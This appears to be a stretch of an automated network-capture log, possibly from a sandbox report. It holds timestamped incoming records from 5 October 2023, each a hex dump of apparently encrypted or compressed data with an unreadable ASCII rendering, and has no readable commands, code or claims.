2023-10-05 16:48:02 UTC	1196	IN	Data Raw: f0 ee 56 2f fb 36 bd 3f 24 a0 31 a9 65 5d b4 04 b7 8c 5d d5 b7 3d eb e4 ae df 23 0a 1f ea 1c 1f 69 62 e2 1e 7f f0 a9 e4 d4 41 9f e6 55 e5 d6 60 3f 9f 58 e8 b4 60 7f 66 5d b9 5e 94 f8 60 8b ae 83 d5 21 d0 4e f3 37 94 6c a3 b9 15 d3 f1 eb d7 90 8a 48 ed 5e 6e 69 50 ec 36 8c c4 97 46 1c 6d 11 2c 9f a6 c9 35 06 a3 c1 1e 82 07 49 0a 17 84 71 9f c2 87 23 dd be 9c 25 b7 c8 70 d5 eb 1e 0d 1e 7e 7b 4a 64 16 bf 48 2c 3e f0 7d 76 0f 35 55 16 30 6f e7 ef 91 05 8a 46 09 e4 47 f1 73 ab a0 b5 7a 05 f9 40 7e cd ee c1 84 93 c6 8a 6e e2 76 ab fc 91 08 b5 53 42 03 39 f4 45 86 ff b9 36 db c8 87 25 e8 7b 8a 3b b5 fe 5a 88 95 e3 47 e9 e5 b2 47 88 43 be 5d 2d 88 96 67 aa 45 e2 73 51 73 5e f4 20 16 88 14 1d 38 2a 63 3c 91 9c de d4 03 bd a6 c5 66 81 24 10 ed 6f 93 8a d1 47 db ca Data Ascii: V/6?$1e]]=#ibAU`?X`f]^`!N7lH^niP6Fm,5Iq#%p~{JdH,>}v5U0oFGsz@~nvSB9E6%{;ZGGC]-gEsQs^ 8*c<f$oG
2023-10-05 16:48:02 UTC	1203	IN	Data Raw: ee 5f bf 94 72 fc c8 29 3b 52 27 a1 28 c3 25 40 08 5e 41 e5 06 89 90 30 1d 03 a8 4b 6a d9 c9 95 ec 30 e0 08 34 00 77 75 13 de 05 84 7d c0 00 62 31 5a 8e 66 f7 da 2f 11 0a 19 4a 83 00 50 6d a4 49 6c e4 21 d8 9e d1 33 4b b2 4a 6d d6 1b 6c b3 0e dd e9 da 49 4b 2b 1e 2e f7 e1 04 89 fc 9a 82 ec 19 fc 6d 5e 5d f8 b2 75 bc 84 0d 9c e1 00 b5 8d 30 04 74 2d 80 23 3f 19 92 d7 b3 22 80 2a 83 8f 1a 76 e5 c1 f6 d1 c7 5c be f0 ef 5d 43 37 e7 ba bb 9a 7e df d4 69 67 91 05 e3 8d 96 d8 28 a0 f0 77 ce 03 d8 34 fa 60 55 eb 6b a7 c2 0f e3 84 0e 16 20 c6 55 c4 fa a4 32 ad 4c 5a 2d f8 9e c1 4a e9 24 89 9f 02 e8 94 a6 69 5a be 0b 4f f4 e1 1b c1 5b ae 3d 58 ee 30 d2 45 09 bb 9f 7d 10 2c 67 80 bd 0d 6c 47 de 3c e3 5d 05 5a 86 b3 86 73 ca c8 c9 aa d4 03 a5 64 25 95 00 82 ae d0 51 Data Ascii: _r);R'(%@^A0Kj04wu}b1Zf/JPmIl!3KJmlIK+.m^]u0t-#?"*v\]C7~ig(w4`Uk U2LZ-J$iZO[=X0E},glG<]Zsd%Q
2023-10-05 16:48:02 UTC	1211	IN	Data Raw: a3 c1 4f 79 4f b9 13 da 34 05 6b 76 a3 37 ca 21 95 cc 2c 3a 5b b9 47 66 3a 37 99 ce b4 b2 0c f4 62 9c ce c0 26 aa fc 86 0e 27 9c fd 48 ac f2 fa 76 a1 34 19 64 d4 14 52 a9 96 6e 82 82 5a a8 25 4a 32 ac e9 50 ac 68 30 c4 4c 24 2a 15 46 79 8f 0d fb ab f5 df 9a da 6e 98 d7 aa 85 bc df 69 40 ab 9e e2 ad d5 7b 49 7b c1 15 0f 2f d4 4f e5 39 f8 8d 51 9a 84 78 e5 18 33 df 2b f6 7a 99 97 08 d0 a0 ab c9 21 f7 62 2b c5 e0 f6 ad 37 d5 62 c4 ab a7 d9 4f 61 c0 5d d2 80 01 b7 e5 b3 62 06 a4 e7 71 49 f8 68 40 55 d0 22 92 d6 d1 ed df 52 30 55 0e 75 7e ad ee 7f 4c 6b 83 4e 16 58 a5 41 19 71 ab b6 33 bf 54 fa 7b b6 3f b9 fe 18 3c 45 eb cb fd e9 24 4c f4 9b 99 98 14 c6 ba ef dd e7 5c 3d 0d 1d 21 06 6e 98 1d bd 01 fa de 8b b8 c9 41 e1 f2 96 33 7c aa a8 09 62 fc 67 6e 5b 0c 46 Data Ascii: OyO4kv7!,:[Gf:7b&'Hv4dRnZ%J2Ph0L$*Fyni@{I{/O9Qx3+z!b+7bOa]bqIh@U"R0Uu~LkNXAq3T{?<E$L\=!nA3\|bgn[F
2023-10-05 16:48:02 UTC	1219	IN	Data Raw: 1e 14 97 8f 4f e7 02 cf 0c 61 ce cc 5d f3 33 3d b8 33 dc a2 d7 7e 45 af 8e 34 67 66 ba 73 d5 98 28 4c c5 30 49 5b 95 99 16 8b 59 22 44 ae 49 49 68 e6 0a bd 6b 98 57 e6 32 e4 11 53 60 0a 15 b3 e4 1d 40 91 16 44 6e 9d 77 1f e0 ce 10 f2 45 fe 52 63 1e 40 62 4c 09 4d 55 8b 60 06 ac 1f 53 79 35 06 a9 52 d5 8e 94 db 8b 42 9e 09 a3 57 86 42 86 76 7e 7a 8b 7f 1a 7b 87 63 e7 6f 27 12 27 3e 8e 62 96 e6 52 28 b5 94 7d f0 7e 6d 6d a7 ef 33 ab 76 ec 6c 47 b9 37 60 98 ca 81 b1 31 48 cb 2a be 98 15 16 7a 5b ea a1 80 17 4c 2a 1d 71 89 28 fd 9e dc fe 1a 7a 05 5e e0 aa 55 09 be 49 15 23 cd 94 89 fb 96 68 d1 62 5a c2 87 80 fc 82 be cf 52 7d c0 96 95 30 94 42 d1 5e e3 66 7f d1 6e d4 1e a1 b0 dd a1 8f a2 d9 75 d8 69 e4 32 f0 4e de 56 a0 de b7 a0 9b bc 85 0d 77 40 0d 17 07 38 Data Ascii: Oa]3=3~E4gfs(L0I[Y"DIIhkW2S`@DnwERc@bLMU`Sy5RBWBv~z{co''>bR(}~mm3vlG7`1Hz[Lq(z^UI#hbZR}0B^fnui2NVw@8
2023-10-05 16:48:02 UTC	1227	IN	Data Raw: 3c d3 ea 60 c3 b6 45 8c 82 1d 2a 0f 51 61 a4 41 95 18 cc 65 6b 75 51 42 94 44 14 5a 25 a5 a3 b5 e0 98 d1 3f 3d 13 e8 fb 05 62 2f 0d d5 02 b8 22 a9 2a 2a 75 68 34 14 55 2a 4d 25 de 59 a2 47 8b 6a 09 1e 02 d8 0b e8 0c 4a 83 00 5b 55 9a 51 0a 45 7b cf 9c 6f 46 2a 52 7b 84 82 76 85 e6 d2 1c 7a 24 6b fb f4 df cb 40 4b eb 9b 51 4a 83 73 2b 68 1e 25 80 55 2a 16 65 8d 05 01 43 b7 6c d3 f0 82 50 43 01 e6 43 a0 fc 00 b7 a8 b4 c6 f7 c2 ac 63 89 48 e5 61 94 12 b7 61 01 b6 20 55 a8 62 3d 20 51 1a 89 29 e4 84 08 02 16 66 c9 70 49 6e 65 9e 7c 2d df 44 61 48 ef f7 d6 b7 81 e5 eb 6e d9 c0 24 c5 f5 b9 55 62 e7 51 60 26 93 2a 19 cc b1 72 b7 2d 30 93 5e 4a 14 bf 9e 38 f7 3d f5 ca 8d 2d e4 6a e2 58 7f e1 70 0d 52 f2 f3 94 62 99 71 a0 c8 e9 ff 25 2c 61 35 8d b8 c4 de 31 81 42 Data Ascii: <`EQaAekuQBDZ%?=b/"uh4UM%YGjJ[UQE{oFR{vz$k@KQJs+h%UeClPCCcHaa Ub= Q)fpIne\|-DaHn$UbQ`&*r-0^J8=-jXpRbq%,a51B
2023-10-05 16:48:02 UTC	1235	IN	Data Raw: 65 34 27 81 f3 e3 39 4d 17 12 1f c9 d1 27 1b 8f 04 0b d3 91 fb 6d ff fe da 8e 96 49 12 0c b9 94 8b 40 a0 54 69 1b c1 42 5c 4a 32 b2 94 8a 31 09 49 20 94 b6 99 46 1f 3a ed 60 b2 f6 80 c9 9b 18 66 7d 11 d5 2a 02 29 e1 36 a6 50 fb 1c c2 f4 34 fd cf 84 3b 28 33 3e 76 07 e3 ff b7 29 84 00 e2 54 50 51 06 7a 51 14 81 85 62 12 04 45 58 41 16 8e 22 21 94 28 4b 80 22 7e 59 50 b4 8e 42 61 10 29 08 61 54 14 24 79 60 47 d5 a7 98 8d f2 b3 be 20 d2 83 b0 25 2c 80 04 0e a0 a8 5c 8c 41 62 5a 4a 0c 2a 98 f3 ab 20 5c 82 74 41 a5 a4 c4 8b 29 37 4e 43 99 86 36 6a 6a 6e 53 11 50 29 96 85 03 0a ec f9 c4 2d 26 02 30 84 10 27 66 70 a7 e8 7e 16 25 5c 91 84 81 14 9c 10 fa 12 22 1a 04 c2 34 93 82 fc fe 2a 40 b0 b9 91 80 3b 25 eb d0 b2 36 d4 ca 6d d6 f2 7e 01 04 00 52 b8 92 9f e2 2b Data Ascii: e4'9M'mI@TiB\J21I F:`f})6P4;(3>v)TPQzQbEXA"!(K"~YPBa)aT$y`G %,\AbZJ \tA)7NC6jjnSP)-&0'fp~%\"4*@;%6m~R+
2023-10-05 16:48:02 UTC	1243	IN	Data Raw: 96 6e 6f b4 fb 33 8c 97 6d 3f f8 63 38 0f dd 6a 1e 7f 7e fe 88 f9 67 90 b5 cc 57 bd ac 2d f6 15 02 b1 7d c0 28 f6 6d f9 8c 8b 80 e2 b3 f2 6d 8d 34 78 e6 bf 7d a4 27 37 4d ad d4 20 7d 21 a5 c4 95 63 fa 12 a4 fe 38 45 47 bb 08 ab 06 77 eb fb 74 bd 0d 90 db fe 89 ce c9 b2 b7 e4 90 f5 1a 8c 1f af cd 60 b5 05 25 b6 a1 78 a6 15 3c d5 bb 35 04 5f 68 67 f1 f2 54 1f 8b a8 23 bd d3 b1 86 e5 a7 96 cc d8 10 d5 a3 b8 5e ea 40 ef 0a 16 b8 e7 07 7c 0f 3e d7 6e cb 5d cf af e4 30 5c 78 eb 2b 4b 98 a7 1e a8 a6 63 eb e1 71 46 10 b5 a3 31 03 00 34 a1 d5 b8 d9 95 79 4f a2 69 08 b1 f5 8a d1 d5 4f 98 09 e6 b9 72 fe 0d c7 93 db 8e 73 49 b2 af 83 15 3c e4 89 7c 78 88 b3 28 4e f6 6f 09 9c 7b 06 94 07 8c a0 69 e7 a6 b9 78 d9 bf bb 0f a1 5a 9d d8 8f 01 e4 ef 6b 97 83 2e 1f a1 5f de Data Ascii: no3m?c8j~gW-}(mm4x}'7M }!c8EGwt`%x<5_hgT#^@\|>n]0\x+KcqF14yOiOrsI<\|x(No{ixZk._
2023-10-05 16:48:02 UTC	1250	IN	Data Raw: 24 39 a2 bc eb e2 3d a4 a3 2e c9 b7 aa 57 ab 2c 3b 9c e0 04 b4 fe 95 97 9d d0 b2 f5 04 c2 af 65 bd 57 a4 53 9f 89 0c 72 95 1d 23 b6 1e 45 b6 04 b8 a6 1d fd 9c 89 94 38 93 ef 1f 38 ff 76 70 cb e8 85 26 00 d2 3f 80 f5 61 1f d7 30 59 08 ea 3b 14 fb 66 a4 bd 6a 31 eb 9d aa ea dc d0 39 fd 48 e1 db 80 c6 bc e3 8c d8 6a 3d 44 12 93 3a 03 8c 42 b2 64 cb 21 7a c5 09 eb 03 ae b9 a2 c3 90 83 9b 04 3f 23 1d 79 7c b4 7e ac 54 04 9f c2 48 05 cf 18 3e 9b 1e 88 d5 22 ce 4e d0 a0 39 a4 31 11 f6 3a 80 2f df 53 7d 71 9d 39 9d f8 f2 86 66 b0 be df 51 6e b0 69 e3 43 51 d2 40 bc 37 46 93 ca ae 06 85 35 a7 a3 dc 57 a0 b0 2f 67 5f 5a 2f ad a1 8a 7e c0 08 fa 76 f3 a1 12 bb 79 4f 3e 5b f7 37 9c 9f c4 b4 88 1e 1a b7 a5 38 ab 1e 9e 23 f8 ad a0 99 64 db 9b fc d0 9f 5b f2 53 3b fa dd Data Ascii: $9=.W,;eWSr#E88vp&?a0Y;fj19Hj=D:Bd!z?#y\|~TH>"N91:/S}q9fQniCQ@7F5W/g_Z/~vyO>[78#d[S;
2023-10-05 16:48:02 UTC	1258	IN	Data Raw: 98 91 b6 d3 9c f1 6e 49 e3 19 29 19 b2 cd 7e 52 f7 82 49 96 ad af 37 f4 bd c7 38 cd e4 41 9d c3 07 0a 36 db ca b9 ca a4 13 7b 59 94 82 48 65 dd 80 5e 40 5e e6 29 a2 d2 03 cb eb 59 c5 a2 be 5e f3 3a e4 19 1a 74 3a fe 05 36 20 0c 44 66 d0 dc d8 0e 03 ba 4a 46 a4 85 f3 a3 16 8f 3c 8a 69 ff b7 90 9a 1a 0e bc 16 f3 e5 86 82 a7 72 63 dd 27 e6 5d 85 c9 71 79 f4 18 00 4a bc d4 62 cd ac af 09 64 5d 45 6e 24 0d 3b f3 71 15 f7 6b f8 1d 44 91 fe 80 4f 77 9a 06 2e 52 e4 3d 67 1f 57 a6 c4 6b d7 0e b3 97 6b 3a a8 d8 54 5a f2 fc 8e a2 cb 00 a1 fc b8 ca a8 35 d5 1f 50 64 1d c8 91 a8 f9 ae 43 de 73 79 c1 30 f9 e5 c3 1f 83 5f e7 7a ef 71 45 03 79 b9 37 cf 89 55 b3 d6 7b 96 28 b3 40 c4 ff ef 43 28 88 c6 c9 a3 db b0 b2 bb be 68 5a c8 98 5c 85 09 61 7d 7b 3c e5 31 f2 6c 4c a6 Data Ascii: nI)~RI78A6{YHe^@^)Y^:t:6 DfJF<irc']qyJbd]En$;qkDOw.R=gWkk:TZ5PdCsy0_zqEy7U{(@C(hZ\a}{<1lL
2023-10-05 16:48:02 UTC	1266	IN	Data Raw: 43 46 46 83 c7 12 de 87 20 e6 b1 2a ce 6d 13 70 a0 e9 e9 b8 aa b9 f7 3f 18 1f f0 8f 29 bc 04 f6 77 c1 d0 44 0e 15 a7 2a 53 8f 26 de 85 d1 a7 ba 54 de d1 38 06 d1 72 c9 7f 7e 44 af b0 1f 1b 6b 39 9e 7d 93 f1 a6 e8 c5 dc b2 eb 52 65 82 ca f8 5e f0 0d 95 f4 dd 95 61 b5 18 74 12 e1 4d b0 be fe bc f7 79 83 1f e8 70 4f 06 57 2d 2f d4 13 44 9e f4 e3 7e ea 71 ab 6a e8 90 39 33 c6 ce 2e 4a bc e2 d1 e3 ef 06 38 7f 9e 15 ae e6 07 66 a1 41 9a 1e f0 84 af ee e8 ad a3 9e 09 7d b4 be 27 1e 1e 1a 0c 79 21 0f f8 d0 36 0b b5 3e e5 43 cc e4 69 d9 6e 5d 87 b2 31 ce 28 de f1 54 c4 cc 81 4d 79 31 95 88 d3 71 05 60 6b 15 f2 a0 0a 32 13 63 e9 04 a7 95 b9 5d ea d5 b2 e9 86 d7 9b af cc 8c 03 d3 97 72 5f 59 9d a5 a6 b1 54 8f 2d 81 87 0a 7a 9a ec 2d 48 be 4e 45 dc 71 f7 13 68 38 3d Data Ascii: CFF mp?)wDS&T8r~Dk9}Re^atMypOW-/D~qj93.J8fA}'y!6>Cin]1(TMy1q`k2c]r_YT-z-HNEqh8=
2023-10-05 16:48:02 UTC	1274	IN	Data Raw: 8d ad e3 c2 fb f9 cf ef e8 27 2a 21 23 a8 67 ee e6 c8 fa b5 3f bf 3c 69 b9 3d 55 c4 ac 7f e7 a8 ce 09 60 79 75 c3 62 70 68 b6 45 91 45 04 70 fe f8 3d 98 79 aa 8a e0 61 0b e9 e2 b6 63 2f 2e 6b 1e 41 a7 13 56 96 28 39 c3 9a 13 7f 9d 1c 2c 31 f2 6e 6d d4 d4 07 cc df 93 5b e6 31 13 6f 7f 1f 64 ff cd f2 6a 24 bb 25 ff c0 a8 7c 48 62 05 6f 9a e6 d6 4a 90 dc 36 6e 62 42 aa 89 09 29 72 d7 1b e7 31 21 ba bf 78 6b 56 7a 0a 85 05 8c 12 59 00 49 47 bc 4c 21 53 58 f0 30 b8 c8 8c 1e 02 79 43 7a 81 73 5e 5b 49 e0 88 a1 f9 e0 a0 ef 57 30 21 70 9e d8 75 72 e9 d7 f7 c4 f0 f2 ab 38 3b 29 ed 1e 76 cc be e4 e2 de 6c 05 82 43 47 30 64 7f 1b 2a 63 7e ef 88 88 d4 d1 d9 11 83 bf 23 d1 ef b2 bf 7b 3d 76 0d 2b f4 08 45 ad f1 99 8d d9 18 16 07 31 0a 64 05 bf b1 fc 20 88 68 b8 e3 8a Data Ascii: '!#g?<i=U`yubphEEp=yac/.kAV(9,1nm[1odj$%\|HboJ6nbB)r1!xkVzYIGL!SX0yCzs^[IW0!pur8;)vlCG0dc~#{=v+E1d h
2023-10-05 16:48:02 UTC	1282	IN	Data Raw: b9 d4 57 72 dc 80 0c d5 2d 8c e1 af f8 72 bd 02 f1 0b 45 cf db ca 40 f7 9a 08 ba 08 1c 89 28 ce cd bf 55 aa b4 e4 c8 bc d8 55 b3 df 9b da dd 12 78 7e 1b 28 c5 c0 de 91 0e 44 7c d4 bd 41 0e cb f9 0b d5 74 06 13 06 b3 0d eb c5 8c 67 33 22 ec d4 37 7c 41 cd ad 81 a7 8c 49 05 b2 bd 80 ef e8 33 3b d8 8d 5f 55 5d 3d d0 fc b9 c8 9e ec 5f 8d a5 b2 93 44 f1 8d e6 e5 ad cc 71 20 26 dc 45 69 9e e2 95 76 3f 27 44 01 4a 68 fe f5 f3 ad 2c d1 ca 06 a3 78 92 56 83 43 3c 25 a0 56 8f e6 42 6b 6f f7 11 cd 83 9a 6c 71 d8 6c c0 72 45 75 70 73 da 2f 27 50 ba 21 be aa ec ef 30 9b d2 3a 72 13 5e 95 38 02 af 93 9b e2 28 f7 95 9d f3 1e f0 c0 40 0d f8 06 53 61 dd de a2 86 1b 2c 5f 97 b4 ae 71 f1 81 7d e1 c3 eb 2a 4d c0 9b 4f 88 7a cf 10 e6 6d b6 10 39 05 bb 5c ab 64 76 e3 68 2a 5b Data Ascii: Wr-rE@(UUx~(D\|Atg3"7\|AI3;_U]=_Dq &Eiv?'DJh,xVC<%VBkolqlrEups/'P!0:r^8(@Sa,_q}MOzm9\dvh[
2023-10-05 16:48:02 UTC	1289	IN	Data Raw: f0 85 7d 2a 7b 3a 00 69 30 1d 64 e4 03 8c ea 12 6f ba fc 08 10 29 46 4a 7b 4c 7d 99 34 40 99 9c aa 46 49 a6 0b 97 9d b1 66 98 ad b0 28 56 9d bd c2 e7 0a 5f 52 fb 12 bb 31 55 4d d9 bf bd e4 f2 82 72 cc 78 b1 4a 73 18 86 20 fa 92 01 e0 48 f0 a6 04 1e 02 25 56 c4 7b fd bf 87 fc 04 b3 d4 43 33 a8 19 81 46 e2 57 1b 15 ff 1e 6e 4b 96 9e 72 c4 d3 22 71 be 16 b2 df 7c 3e a2 1e f9 b3 ee 02 86 59 9d 6d 14 10 7d 15 ac 19 c4 78 5a d4 40 f5 15 be 0e 15 3e ad cf 9c 2b 7f 4e 8f 19 5e 8d 33 d8 df 44 48 67 e5 52 e1 3b 3d b1 ad 99 b2 91 a8 fa 5c 54 0f fe 81 a9 f6 7c 08 fd 82 a6 d6 72 89 ee 5b 24 aa 9d c0 62 29 55 8c 59 00 63 36 55 3c 2c b3 df 2e dd 34 1e d7 bf 1c 4b af 2d ae ec 96 65 fa 50 bc ee 81 28 5e 67 3d 9c 8b 23 58 1f be 48 98 a7 0c 40 2a 39 bf e2 d4 87 5b 6b 74 97 Data Ascii: }{:i0do)FJ{L}4@FIf(V_R1UMrxJs H%V{C3FWnKr"q\|>Ym}xZ@>+N^3DHgR;=\T\|r[$b)UYc6U<,.4K-eP(^g=#XH@9[kt
2023-10-05 16:48:02 UTC	1297	IN	Data Raw: 39 28 21 12 02 4f 47 40 57 cd 57 33 eb 61 3a 8b 47 3d 08 c6 51 72 68 10 c8 03 08 83 00 42 29 3c 80 fa 10 0a 6e e2 00 08 82 40 53 3f 51 3a 4a 05 1f 02 88 70 a9 11 e7 02 1a dd 41 44 e4 23 62 20 00 52 1f 2d 50 e2 04 80 49 26 b1 f0 28 cd f0 0c 8f 24 c4 ee 94 00 48 34 15 aa a1 4c aa cf 24 1d c3 b8 28 20 b8 9c 40 8e a9 27 16 40 c4 c3 50 c9 30 84 04 40 70 88 64 a4 db f6 44 b9 ef 41 db 36 fe bf 22 f8 0e 22 c3 96 27 10 f7 be 35 de c8 f3 6a 34 02 ce 80 78 13 c5 3f 70 bd 5a 00 31 a2 d1 59 58 bd ea 6e 24 00 9b 29 08 0a 00 b3 22 45 08 7e 44 b5 d3 90 94 01 48 a4 30 78 80 3d 11 8d c2 35 54 a1 ee a1 88 0f b1 d4 05 4c 92 e9 0d 22 1f 88 82 79 71 1e 84 d0 c1 04 79 11 a1 a5 80 4a 0c 5a 88 21 b7 b3 0a 9d 5b ec b6 5b 94 ef ca 6a bd 8b cd 84 dd 78 8f 3e 94 12 28 ee 46 dd 53 2f Data Ascii: 9(!OG@WW3a:G=QrhB)<n@S?Q:JpAD#b R-PI&($H4L$( @'@P0@pdDA6""'5j4x?pZ1YXn$)"E~DH0x=5TL"yqyJZ![[jx>(FS/
2023-10-05 16:48:02 UTC	1305	IN	Data Raw: 1a c7 56 03 41 7f a9 00 cc 60 b3 86 e6 63 7e c9 74 26 cd 9c c3 e4 ad f9 17 f0 ac 90 3d f6 fc 47 13 d0 6a 1f 47 82 01 ef 2f 19 25 36 fc a3 64 00 a7 ef da b7 2d 95 7b 7a 16 90 15 73 ca 8e 37 d0 95 96 46 9a 10 5d bc f2 62 e2 8a b9 8d f3 f3 6a 11 68 7e 6f e6 75 5e aa a5 f3 70 df d1 fe d5 b4 4c fa 5e 0f 4f b8 e7 2c f3 83 9f 48 cb ff 19 ef 8c 3a f2 f8 26 63 7a 42 99 83 2e d4 bb 50 15 91 d9 60 96 f4 6f 89 f3 1f 0b 2b 95 f8 e7 b6 6b 5b 2f 03 77 80 50 fa a9 cf 8c bf 82 eb 27 9e 70 cb 6d 18 36 a2 d8 2e 19 37 fb 2e 5e b4 a9 9e fb da cc 97 4f e0 ad 03 06 ac b6 f9 e6 63 af d5 7b 2c 31 1a 60 7d 5b 2a 9a c3 68 9f ef e7 64 b9 ff 94 49 a9 3c 79 e5 9f dd 9a 43 57 b1 b4 a8 a6 89 96 fb 0e 2e 98 36 d3 e8 97 ba 6a e2 27 70 09 4a 95 2f 3a ee 4f 3b 40 75 f0 af 11 64 91 55 51 3b Data Ascii: VA`c~t&=GjG/%6d-{zs7F]bjh~ou^pL^O,H:&czB.P`o+k[/wP'pm6.7.^Oc{,1`}[*hdI<yCW.6j'pJ/:O;@udUQ;
2023-10-05 16:48:02 UTC	1313	IN	Data Raw: 1c 4d 57 6f c4 1a d6 ff 3c 71 45 99 97 09 ae 7e 0d 60 cf c7 b6 38 69 7a f0 f5 b7 9d d2 fd b7 1a a2 12 40 c2 a9 6a a3 94 e9 84 66 6f 04 7b 4a be c2 c2 5a 01 fa b5 bd fa 29 60 ed c4 93 2b e9 38 2a 74 e7 57 0d 10 f4 24 87 fa 81 bf ca f8 49 ae 8a 88 ee 00 cf f4 8b ea 8d 12 ea e1 4e 72 7c a8 cf fc 8e e8 61 73 2d 85 07 96 a0 48 92 ab 5f cd b4 89 25 37 b4 da c3 2a 97 5c 93 45 49 50 b8 ba 02 13 9d 5f 38 8e 46 69 16 e2 79 a9 c9 9b 33 3c f5 f4 4e f3 d5 92 ec 49 91 56 69 4e fe 05 02 64 f0 ff af 29 ce 00 2c 1b 8c ca c8 cb 93 c7 59 93 c5 7e 40 14 4b d9 93 f8 a8 31 d4 1b 5a 2a 60 2c d0 72 b3 2a 07 da 3e 45 43 a0 6f a5 b5 5a a1 7c 20 a3 5d 2b 29 90 87 75 2b c4 aa 7b 0f 48 af 90 99 54 f4 d1 90 75 16 9f cf 96 ed 56 c2 8e e0 bf ad 6e f1 5e c1 16 69 72 a6 7d e0 ca 26 ad f6 Data Ascii: MWo<qE~`8iz@jfo{JZ)`+8tW$INr\|as-H_%7\EIP_8Fiy3<NIViNd),Y~@K1Z`,r>ECoZ\| ]+)u+{HTuVn^ir}&
2023-10-05 16:48:02 UTC	1321	IN	Data Raw: 0c ac 66 f5 b2 db f0 ca 34 24 0f fa df 87 c2 0b af ad aa b0 bc f0 95 2c d9 38 13 44 ad 06 f2 4e 15 3a fd 8a 15 51 bd 41 50 6a ae b2 84 dd 3a 29 50 b5 a2 7d f9 57 15 54 91 4f 0d a7 1c d6 c3 de 30 09 8a 9b 5f 5a 2a ea a3 45 14 5d 64 8a ba 40 3b 7e 8f 9c bd 97 fe 91 ac d1 94 5b 71 28 92 80 35 44 8f 78 e6 9a df 08 f5 6f 90 a9 5b c2 82 8c 38 56 76 97 99 12 c7 0a 81 99 e4 82 30 58 8a 9d a3 38 07 33 45 9a 9c aa d8 cd 0b 2d 6b b1 5f cb 91 41 64 76 e7 56 78 a6 6d c4 50 34 dd 80 49 93 82 f8 45 5b b7 7b d6 59 c3 c1 2c 72 35 1d 6e b7 ab bc e9 d5 9f 6a 6b 4a 41 1b ab a5 92 7e 6d 61 32 56 a1 72 7d a0 06 19 36 ee 18 77 b6 02 ae 8e 01 0d 86 c2 98 25 b4 e9 c9 c6 d9 9e 42 94 33 a9 7f f4 b6 26 f5 af 40 48 79 66 99 e0 f4 4d d8 8c a0 76 9d e0 69 30 29 e2 9b e8 8b 32 8a db 05 Data Ascii: f4$,8DN:QAPj:)P}WTO0_Z*E]d@;~[q(5Dxo[8Vv0X83E-k_AdvVxmP4IE[{Y,r5njkJA~ma2Vr}6w%B3&@HyfMvi0)2
2023-10-05 16:48:02 UTC	1328	IN	Data Raw: a6 1d 5f cb 6f b0 c2 46 5f 1b 38 27 66 5b 3a 8b c9 71 55 04 b2 e8 13 34 d6 5d 5e 7f c4 c1 06 ca db 90 0e 7c 72 b8 d3 39 7a dd d6 81 58 88 8e 42 63 4d 3f 09 c9 3d 2f eb 96 ce 57 c8 6e 38 d1 02 53 c1 07 06 f4 e2 68 c6 68 3f 8d 06 d5 74 2f d4 4d 6e da 73 25 93 14 00 fe ec 41 b9 23 d6 9d 05 dc a4 23 f0 0a aa 7c 45 e5 5e c0 ad f5 b4 be 87 00 8e 03 f9 e6 50 68 5c 12 86 e8 74 ec 07 98 77 35 5a 56 46 20 7f 4a 1a 69 ae 5f 27 1f d8 a3 7a 54 2a 19 bc 8e 35 9e 37 01 ea 25 b2 05 19 f8 0a 0d d7 e8 04 39 29 5c f4 ae c8 3c 83 fe eb 95 ba 34 99 e1 4d 8b ef 35 d9 90 35 7c b4 22 0d 7d 51 9c 05 5c 01 30 65 3d bc 3d 0c 2f 1c 35 dc 8f 37 72 88 01 e2 aa c0 5e 9c d4 42 eb 07 d2 b6 8f b5 50 1f e9 c3 89 fe 38 60 bb bb 0b 07 f1 2d f4 83 2f 8f 24 9d f3 e4 93 0d f2 d0 7a b1 ea 23 0f Data Ascii: _oF_8'f[:qU4]^\|r9zXBcM?=/Wn8Shh?t/Mns%A##\|E^Ph\tw5ZVF Ji_'zT*57%9)\<4M55\|"}Q\0e==/57r^BP8`-/$z#
2023-10-05 16:48:02 UTC	1336	IN	Data Raw: ff 91 a2 c4 1b 50 2e ab 7c e7 b9 80 c2 dd 1e 4d 70 6f a3 8c e2 fc 79 d5 66 6e 09 39 d6 7d 6b 94 5e b0 a6 43 79 85 97 56 72 ea 9d 32 88 ae 31 81 b4 77 95 6c b3 dd ab 6a c7 a7 5e 6c 7c b4 a7 61 76 0b 58 b5 5c db ba 57 8f 04 88 56 5d 95 bf b3 bc e9 02 c4 54 b8 ad 87 90 e5 a6 2e 3a a9 ad 22 9e 1f fd a0 4c 55 15 1a 1f 96 29 c1 07 c6 0f 50 d4 be 9c 1d 30 ce 7c 27 b4 4e 1f 03 5c bb 45 32 01 0d 4d df d0 87 5e d1 90 ca 09 f2 2a 5f 71 94 cc a7 99 39 04 f0 e2 9c 81 20 ed 68 c0 bb 17 85 f5 76 63 61 b0 a0 4f d8 09 2b dd 5c e3 aa 3a fa ca 3c fc b0 44 78 2a 90 33 dd ad 10 a0 d1 89 63 2c bd 78 7b cb 8e ed 0c 97 3e 6f 84 7a 1f 30 04 7e b1 92 2b 3f 7e 1c 4f 65 b8 b7 b9 fa cd ce de e5 65 93 23 f3 48 9f 5c b5 c4 0b 35 f2 80 4f d4 ab 5d e8 0f 7b 2c bd 60 72 43 14 fd b0 07 d8 Data Ascii: P.\|Mpoyfn9}k^CyVr21wlj^l\|avX\WV]T.:"LU)P0\|'N\E2M^_q9 hvcaO+\:<Dx3c,x{>oz0~+?~Oee#H\5O]{,`rC
2023-10-05 16:48:02 UTC	1344	IN	Data Raw: b8 b0 f3 1e e5 6b 46 0e ac 84 a1 61 e2 59 52 e3 e6 aa 54 f5 c0 4f d7 3f 1b 8e a5 8f 21 4d 65 53 20 91 57 c3 41 52 2c 00 ae 4e 22 92 45 7c fa 51 36 64 d1 87 f2 a9 6f 99 c2 a6 15 99 fd 9e ce 14 bf ce e0 97 25 ce b6 82 64 68 29 b2 bb 9f 52 17 73 87 66 2e 36 1e ff ca fe 46 2b 61 d8 5e 28 a7 20 05 98 3e b1 c8 40 69 77 37 5e 8a fd ca 20 d6 cc 66 a7 57 92 9e f7 99 58 db f5 cc 61 db 16 8b 84 60 0e 48 0b 7a 87 08 37 14 85 98 11 23 1d 22 f3 26 f7 2e a0 a7 cf c1 f1 ba 56 2d eb 7b f5 a4 76 f4 a0 10 62 55 19 04 b0 7d 52 6b d0 82 28 16 04 57 64 7c 40 aa 32 2d a5 b6 e1 29 c7 43 c7 00 c4 73 d2 b0 8f bd 68 42 92 4c 36 09 a6 d5 12 e0 30 58 54 08 71 0d 68 ab e8 70 86 71 64 c4 04 f8 f2 41 40 c3 7d 20 bf b2 ff 98 8d b8 90 49 b1 f6 ab 96 ac 2b 13 a2 52 ec 0e 66 72 3e c0 b6 be Data Ascii: kFaYRTO?!MeS 